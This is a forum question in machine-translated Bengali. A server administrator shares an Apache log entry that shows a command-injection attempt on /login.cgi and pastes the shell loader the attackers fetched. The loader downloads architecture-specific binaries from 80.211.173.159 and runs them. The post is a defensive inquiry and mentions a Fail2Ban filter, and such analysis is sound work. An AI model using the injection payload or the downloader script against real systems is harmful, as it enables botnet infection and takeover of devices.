আমি আমার সার্ভারগুলি অ্যাপাচি লগগুলিতে লক্ষ্য করছি, ইদানীং নিম্নোক্ত অদ্ভুত লাইনগুলি:
156.222.222.13 - - [08/Sep/2018:04:27:24 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.173.159/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1" 400 0 "-" "LMAO/2.0"
সুতরাং আমি একটি কাস্টম Fail2Ban ফিল্টার তৈরি করেছিলাম এবং এই / লগিন.সি.জি. URL গুলির জন্য অনুরোধ করা আইপিগুলিকে নিষিদ্ধ করা শুরু করি।
তবে তারা কী করার চেষ্টা করছে তা সম্পর্কে আমি আগ্রহী ছিলাম, তাই তারা যে স্ক্রিপ্টটি কার্যকর করার চেষ্টা করছে তা আমি টানলাম এবং এটি ঠিক কী করে তা আমি অনুভব করতে পারি না। / Var এবং / tmp তে খিলান ফোল্ডারগুলি সরানোর বিষয়ে কিছু?
যাইহোক, এটি এখানে:
#!/bin/sh
u="asgknskjdgn"
bin_names="mmips mipsel arm arm7 powerpc x86_64 x86_32"
http_server="80.211.173.159"
http_port=80
cd /tmp/||cd /var/
for name in $bin_names
do
rm -rf $u
cp $SHELL $u
chmod 777 $u
>$u
wget http://$http_server:$http_port/$name -O -> $u
./$u $name
done
hxxp://80.211.173.159:80/$name
যেখানে $name
রয়েছে সেখানে অবস্থিত হবে bin_names
। সুতরাং 7 আক্রমণ স্ক্রিপ্টগুলি ডাউনলোড এবং সম্পাদন করা হবে